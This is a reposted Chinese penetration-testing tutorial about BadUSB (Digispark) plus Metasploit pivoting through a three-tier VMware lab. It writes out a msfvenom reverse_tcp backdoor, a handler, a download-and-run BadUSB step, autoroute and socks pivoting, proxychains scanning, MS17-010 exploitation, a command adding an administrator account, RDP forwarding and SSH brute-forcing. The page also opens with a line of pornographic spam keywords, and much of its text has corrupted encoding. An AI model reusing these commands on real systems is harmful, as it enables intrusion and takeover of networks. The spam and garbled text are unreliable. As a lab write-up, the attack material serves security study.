日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢(xún)
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時(shí)間:8:30-17:00
你可能遇到了下面的問(wèn)題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營(yíng)銷(xiāo)解決方案
如何利用BadUSB穿透3層內(nèi)網(wǎng)

如何利用BadUSB穿透3層內(nèi)網(wǎng),很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

公司主營(yíng)業(yè)務(wù):成都網(wǎng)站設(shè)計(jì)、成都做網(wǎng)站、移動(dòng)網(wǎng)站開(kāi)發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實(shí)現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競(jìng)爭(zhēng)能力。創(chuàng)新互聯(lián)是一支青春激揚(yáng)、勤奮敬業(yè)、活力青春激揚(yáng)、勤奮敬業(yè)、活力澎湃、和諧高效的團(tuán)隊(duì)。公司秉承以“開(kāi)放、自由、嚴(yán)謹(jǐn)、自律”為核心的企業(yè)文化,感謝他們對(duì)我們的高要求,感謝他們從不同領(lǐng)域給我們帶來(lái)的挑戰(zhàn),讓我們激情的團(tuán)隊(duì)有機(jī)會(huì)用頭腦與智慧不斷的給客戶帶來(lái)驚喜。創(chuàng)新互聯(lián)推出漢陽(yáng)免費(fèi)做網(wǎng)站回饋大家。

作為一個(gè)安全人員,聽(tīng)過(guò)許多社工APT案例,釣魚(yú)郵件、水坑攻擊、丟個(gè)u盤(pán)等等。前段時(shí)間在一次培訓(xùn)中了解到BadUSB的攻擊方式,可以通過(guò)U盤(pán)達(dá)到控制服務(wù)器的效果,在著名的美劇《黑客軍團(tuán)》中也出現(xiàn)了在停車(chē)場(chǎng)扔BadUSB來(lái)進(jìn)行釣魚(yú)的場(chǎng)景。

一時(shí)好奇,于是嘗試模擬一次社工,利用VMware搭建了3層網(wǎng)絡(luò)靶場(chǎng),通過(guò)BadUSB+MSF的攻擊手段,一步一步滲透到第三層網(wǎng)絡(luò)。  

0x01 三層網(wǎng)絡(luò)靶場(chǎng)搭建

本次模擬實(shí)驗(yàn)的網(wǎng)絡(luò)拓?fù)淙缦拢?br/>第一層網(wǎng)絡(luò),模擬企業(yè)辦公網(wǎng),為一臺(tái)win7的員工辦公電腦,第二層網(wǎng)絡(luò)模擬內(nèi)網(wǎng),是一臺(tái)win2003服務(wù)器,第三層網(wǎng)絡(luò)為企業(yè)核心網(wǎng),為一臺(tái)Linux服務(wù)器。攻擊者的攻擊機(jī)有kali和win10。

如何利用BadUSB穿透3層內(nèi)網(wǎng)

我們可以利用VMware搭建出3層網(wǎng)絡(luò)的網(wǎng)絡(luò)環(huán)境,首先在虛擬機(jī)中新建3塊網(wǎng)卡,并選擇僅主機(jī)模式:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)

我們將kali設(shè)為第一層網(wǎng)絡(luò)vmnet1,在網(wǎng)絡(luò)適配器中選擇自定義vmnet1:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


在第一層靶機(jī)win7虛擬機(jī)設(shè)置中添加一個(gè)網(wǎng)絡(luò),并將兩個(gè)網(wǎng)絡(luò)分別設(shè)為vmnet1和vmnet2,達(dá)到雙網(wǎng)卡的效果:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


同理,將第二層靶機(jī)win2003設(shè)為雙網(wǎng)卡vmnet2和vmnet3:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


最后,將第三層靶機(jī)linux的網(wǎng)絡(luò)設(shè)為vmnet3:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


至此,我們本次試驗(yàn)的3層網(wǎng)絡(luò)靶場(chǎng)已經(jīng)搭建完畢,攻擊者的kali只能訪問(wèn)第一層網(wǎng)絡(luò),而無(wú)法訪問(wèn)第二層和第三層的靶機(jī):  

如何利用BadUSB穿透3層內(nèi)網(wǎng)

0x02 BadUSB介紹

  • 效果演示
    在介紹BadUSB之前,我們先來(lái)看一下他的威力,下面的u盤(pán)看上去是一個(gè)u盤(pán),但其實(shí)內(nèi)部是一個(gè)單片機(jī),普通人很容易被迷惑。

如何利用BadUSB穿透3層內(nèi)網(wǎng)


我在本地的win10上做了演示,我的系統(tǒng)裝了防病毒軟件,并且補(bǔ)丁也更新到最新,但當(dāng)我將上面的u盤(pán)查到電腦上的時(shí)候,他達(dá)到了任意執(zhí)行命令的效果。

如何利用BadUSB穿透3層內(nèi)網(wǎng)


當(dāng)然上面的操作只是為了演示,我們完全可以利用他來(lái)做更多隱蔽的攻擊操作。  

  • 什么是BadUSB?
    簡(jiǎn)單來(lái)說(shuō),就是讓USB設(shè)備偽裝成鍵盤(pán),被插入的電腦猝不及防會(huì)被迅速輸入一定的“指令”,這個(gè)指令會(huì)讓該電腦迅速成為肉雞,這個(gè)漏洞最早在2014年的BlackHat安全大會(huì)上公布。BadUSB最可怕的一點(diǎn)是惡意代碼存在于U盤(pán)的固件中,由于PC上的殺毒軟件無(wú)法訪問(wèn)到U盤(pán)存放固件的區(qū)域,因此也就意味著殺毒軟件和U盤(pán)格式化都無(wú)法應(yīng)對(duì)BadUSB進(jìn)行攻擊。

  • 常見(jiàn)的BadUSB
    1、TEENSY
    攻擊者在定制攻擊設(shè)備時(shí),會(huì)向USB設(shè)備中置入一個(gè)攻擊芯片,此攻擊芯片是一個(gè)非常小而且功能完整的單片機(jī)開(kāi)發(fā)系統(tǒng),它的名字叫TEENSY。通過(guò)TEENSY你可以模擬出一個(gè)鍵盤(pán)和鼠標(biāo),當(dāng)你插入這個(gè)定制的USB設(shè)備時(shí),電腦會(huì)識(shí)別為一個(gè)鍵盤(pán),利用設(shè)備中的微處理器與存儲(chǔ)空間和編程進(jìn)去的攻擊代碼,就可以向主機(jī)發(fā)送控制命令,從而完全控制主機(jī),無(wú)論自動(dòng)播放是否開(kāi)啟、是否安裝殺毒軟件,都可以成功。

如何利用BadUSB穿透3層內(nèi)網(wǎng)


2、USB RUBBER DUCKY
簡(jiǎn)稱(chēng)USB橡皮鴨,是最早的按鍵注入工具,通過(guò)嵌入式開(kāi)發(fā)板實(shí)現(xiàn),后來(lái)發(fā)展成為一個(gè)完全成熟的商業(yè)化按鍵注入攻擊平臺(tái)。它的原理同樣是將USB設(shè)備模擬成為鍵盤(pán),讓電腦識(shí)別成為鍵盤(pán),然后進(jìn)行腳本模擬按鍵進(jìn)行攻擊。  

如何利用BadUSB穿透3層內(nèi)網(wǎng)

  • 制作一款簡(jiǎn)易BadUSB
    制作一款BadUSB我們需要以下工具:

1、BadUSB設(shè)備,目前在淘寶有售,我們這里選用的是Digispark,Digispark是一個(gè)基于ATTINY85微控制器的USB開(kāi)發(fā)板,體積小且價(jià)錢(qián)便宜,淘寶有售:https://item.taobao.com/item.htm?spm=a1z09.2.0.0.57db2e8dK2zETX&id=559310622821&_u=b50qdl8ef4d

如何利用BadUSB穿透3層內(nèi)網(wǎng)


2、Arduino IDE
Arduino IDE用于燒錄代碼的編譯器,可以將我們的惡意代碼燒錄到BadUSB中,配置好相關(guān)參數(shù),將開(kāi)發(fā)板設(shè)為Digispark,編程器設(shè)為USBtinyISP:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


編寫(xiě)好代碼后,我們就可以點(diǎn)擊“上傳”按鈕,然后插入BadUSB設(shè)備,一款簡(jiǎn)易BadUSB就做好了。

0x03 MSF內(nèi)網(wǎng)滲透

有了上面的BadUSB的知識(shí),我們可以模擬一個(gè)社工場(chǎng)景:企業(yè)內(nèi)部人員撿到了一個(gè)“u盤(pán)”,出于好奇插在了自己的辦公電腦上,而這個(gè)“u盤(pán)”其實(shí)是一個(gè)BadUSB,插上之后會(huì)自動(dòng)下載攻擊者用MSF制作的后門(mén),所以在插上u盤(pán)之后,員工的辦公電腦就已經(jīng)被黑客控制,黑客從而可以進(jìn)一步進(jìn)行內(nèi)網(wǎng)滲透、橫向擴(kuò)展。下面我們就來(lái)看看如何利用MSF一步一步進(jìn)行內(nèi)網(wǎng)滲透:

  • 制作MSF后門(mén):
    msf的msfvenom命令可以生成我們所需要的后門(mén):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.59.128 LPORT=6666 -f exe >shell.exe

    其中,192.168.59.128是msf監(jiān)聽(tīng)端的地址,6666是msf監(jiān)聽(tīng)端的端口。我們將生成的shell.exe放在卡里搭建的web服務(wù)上。

  • MSF開(kāi)啟監(jiān)聽(tīng):
    在MSF服務(wù)端,我們開(kāi)啟監(jiān)聽(tīng),等待win7反彈shell:

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.59.128
    set LPORT 6666
    exploit

     

    如何利用BadUSB穿透3層內(nèi)網(wǎng)

  • BadUSB燒入攻擊程序
    根據(jù)工作中真實(shí)監(jiān)控的payload套路,我們?cè)贐adUSB中燒入如下程序,讓第一層靶機(jī)Win7自動(dòng)下載攻擊者kali中的制作好的shell.exe,并執(zhí)行:

如何利用BadUSB穿透3層內(nèi)網(wǎng)


這樣一來(lái),當(dāng)win7被插上u盤(pán)后,攻擊者的msf就獲得了一個(gè)反彈shell:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)

  • meterpreter滲透
    Meterpreter是MSF中的一個(gè)模塊,攻擊payload在攻擊成功以后給我們返回一個(gè)控制通道——Meterpreter shell。Meterpreter shell作為滲透模塊有很多有用的功能,比如添加一個(gè)用戶、打開(kāi)shell、得到用戶密碼、上傳下載遠(yuǎn)程主機(jī)的文件、運(yùn)行cmd.exe、捕捉屏幕、得到遠(yuǎn)程控制權(quán)、捕獲按鍵信息、清除應(yīng)用程序、顯示遠(yuǎn)程主機(jī)的系統(tǒng)信息、顯示遠(yuǎn)程機(jī)器的網(wǎng)絡(luò)接口和IP地址等信息等等。

我們可以在meterpreter中輸入shell獲得靶機(jī)win7的shell,執(zhí)行ipconfig,發(fā)現(xiàn)第二層網(wǎng)絡(luò)的網(wǎng)段信息:

如何利用BadUSB穿透3層內(nèi)網(wǎng)


為了使得MSF能夠繼續(xù)對(duì)第二層網(wǎng)絡(luò)進(jìn)行滲透,我們首先需要添加路由表:  

metepreter> run autoroute -s 192.168.90.0/24

如何利用BadUSB穿透3層內(nèi)網(wǎng)


這樣,通往192.168.90.0/24網(wǎng)段的流量通過(guò)meterpreter 的session2進(jìn)行路由。然后,我們?cè)趍sf啟動(dòng)socks代理:  

msf> use auxiliary/server/socks4a   
msf > set srvhost 192.168.59.128     
msf > set srvport 9999  
msf > run

如何利用BadUSB穿透3層內(nèi)網(wǎng)


這樣其他攻擊軟件可以通過(guò)MSF socks代理、添加的路由對(duì)第二層滲透。  

此時(shí),我們已經(jīng)可以訪問(wèn)第二層網(wǎng)絡(luò)192.168.90.0/24了,按照常見(jiàn)的滲透思路,我們會(huì)對(duì)第二層網(wǎng)絡(luò)進(jìn)行掃描探測(cè),看看存活主機(jī)有哪些,比如用nmap進(jìn)行掃描,不過(guò)在此之前,我們還需要配置kali中的proxychain,通過(guò)proxychain 將nmap的流量通過(guò)msf的socks代理,進(jìn)行第二層的網(wǎng)絡(luò)掃描。

  • 配置proxychain
    修改/etc/proxychains.conf,將里面的服務(wù)器和端口設(shè)置為msf socksserver的信息:

    此時(shí),我們可以利用nmap進(jìn)行第二層網(wǎng)絡(luò)的探測(cè):

  • 如何利用BadUSB穿透3層內(nèi)網(wǎng)

由于proxychains無(wú)法代理icmp的數(shù)據(jù)包 所以必須添加-Pn -sT參數(shù),即不檢測(cè)主機(jī)是否存活,直接進(jìn)行端口tcp掃描。

proxychains nmap -Pn -sT -p80,3306,445,3389,22 192.168.90.129-132

如何利用BadUSB穿透3層內(nèi)網(wǎng)


通過(guò)掃描我們發(fā)現(xiàn)了,第二層網(wǎng)絡(luò)中的靶機(jī)地址192.168.90.129,同時(shí)開(kāi)啟了80、445、3306、3389端口,因此下一步的滲透可以從這幾個(gè)端口考慮。  這里有幾個(gè)思路,可以從80端口找漏洞,嘗試上傳webshell,3306和3389可以嘗試口令爆破,而445端口第一個(gè)就會(huì)想到大名鼎鼎的MS17-010,永恒之藍(lán)。  

  • 永恒之藍(lán)
    雖然wannacry事件已經(jīng)過(guò)去一年多了,內(nèi)網(wǎng)里存在ms17-010漏洞的情況在各個(gè)行業(yè)并不少見(jiàn),在這次模擬環(huán)境中,第二層網(wǎng)絡(luò)win2003就存在這個(gè)漏洞,我們可以利用msf直接對(duì)ms17-010進(jìn)行利用,拿到shell,配置攻擊參數(shù),由于第二層服務(wù)器無(wú)法直接和攻擊者的kali進(jìn)行通信,所以這里注意payload要設(shè)置為bind_tcp,即采用正向代理的模式。

如何利用BadUSB穿透3層內(nèi)網(wǎng)


成功攻擊,獲得meterpreter shell:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


拿到system權(quán)限,我們可以修改administrator密碼,或者新增管理員用戶:  

net user tinhyfisher tinyfisher /add 添加用戶tinyfisher密碼為tinyfisher  
net localgroup administrators tinyfisher /add 將帳號(hào)tinyfishe升級(jí)為管理員
  • 端口轉(zhuǎn)發(fā)
    我們看到,第二層的win2003服務(wù)器開(kāi)啟了3389,我們可以登錄遠(yuǎn)程桌面,如果沒(méi)有開(kāi)啟也沒(méi)關(guān)系,我們可以通過(guò)下面的命令開(kāi)啟。

    metepreter>run getgui -e  
    或者
    metepreter>run post/windows/manage/enable_rdp

    現(xiàn)在,我們無(wú)法直接從最外層訪問(wèn)第二層的3389,我們需要將3389的流量轉(zhuǎn)發(fā)出來(lái),從而登錄遠(yuǎn)程桌面:

    metepreter> portfwd add -l 7777 -p 3389 -r 192.168.90.129 #將目標(biāo)機(jī)192.168.90.129的3389端口轉(zhuǎn)發(fā)到本地kali 7777端口


    至此,我們已經(jīng)可以在自己的攻擊機(jī)上,遠(yuǎn)程登錄并控制第二層靶機(jī)了。

  • 如何利用BadUSB穿透3層內(nèi)網(wǎng)

  • 第三層網(wǎng)絡(luò)滲透
    同樣,我們要進(jìn)一步對(duì)第三層網(wǎng)路進(jìn)行滲透的話,第一步還是添加到第三層的路由:

如何利用BadUSB穿透3層內(nèi)網(wǎng)


然后是利用nmap探測(cè)第三層網(wǎng)絡(luò)端口信息:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


開(kāi)放了80和22端口,思路比較明顯,要拿到權(quán)限,要么ssh口令爆破,要么從web端找漏洞傳webshell。  

  • 口令爆破
    首先嘗試第一個(gè)思路,看看ssh是否存在弱口令,我們使用auxiliary/scanner/ssh/ssh_login模塊,配置好用戶名和字典,開(kāi)始爆破:

如何利用BadUSB穿透3層內(nèi)網(wǎng)


果然存在弱口令123456,直接拿到root權(quán)限。  

  • web滲透
    我們可以在瀏覽器中配置kali為代理服務(wù)器,從而訪問(wèn)第三層網(wǎng)絡(luò):

如何利用BadUSB穿透3層內(nèi)網(wǎng)


打開(kāi)訪問(wèn),發(fā)現(xiàn)是Typecho的博客系統(tǒng):  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


對(duì)于這種CMS我們的思路一般是直接去互聯(lián)網(wǎng)搜索CMS的漏洞poc進(jìn)行測(cè)試,這里就不再進(jìn)一步演示:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)


至此,我們通過(guò)BadUSB讓第一層網(wǎng)絡(luò)中的win7系統(tǒng)下載并運(yùn)行我們的惡意軟件,然后通過(guò)MSF利用MS17-010、口令爆破、web滲透等方式穿透三層內(nèi)網(wǎng),最終拿下第三層網(wǎng)絡(luò)系統(tǒng)的權(quán)限。常見(jiàn)的滲透思路可以參考下面的腦圖:  

如何利用BadUSB穿透3層內(nèi)網(wǎng)

本次模擬只是最簡(jiǎn)單的演示,實(shí)際情況會(huì)比這個(gè)復(fù)雜的多,比如目標(biāo)會(huì)安裝防病毒軟件,因此,當(dāng)利用BadUSB下載msf后門(mén)的時(shí)候需要考慮如何免殺,不然很容易被發(fā)現(xiàn);各個(gè)網(wǎng)段一般也會(huì)做隔離,因此如何找到網(wǎng)絡(luò)突破口比較難;內(nèi)部會(huì)有各種安全設(shè)備,比如IDS、蜜罐、TDA等等,所以真正滲透比本次試驗(yàn)要難的多。

但這里出現(xiàn)的員工安全意識(shí)較差,補(bǔ)丁更新不及時(shí)、沒(méi)有安裝防病毒軟件或者病毒庫(kù)更新不及時(shí)、以及系統(tǒng)存在弱口令的問(wèn)題在實(shí)際工作中也是經(jīng)常遇到,做好企業(yè)安全工作這些基礎(chǔ)工作很重要。

最后,通過(guò)USB接口攻擊的案例很多,BadUSB只是一類(lèi),還有通過(guò)USB接口橫跨PC和Mobile平臺(tái)進(jìn)行攻擊的案例。我們?cè)谌粘J褂肬SB設(shè)備時(shí),不要使用陌生的USB設(shè)備,避免USB存在惡意代碼導(dǎo)致安全風(fēng)險(xiǎn)。

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道,感謝您對(duì)創(chuàng)新互聯(lián)的支持。


分享名稱(chēng):如何利用BadUSB穿透3層內(nèi)網(wǎng)
文章起源:http://www.dlmjj.cn/article/gjoids.html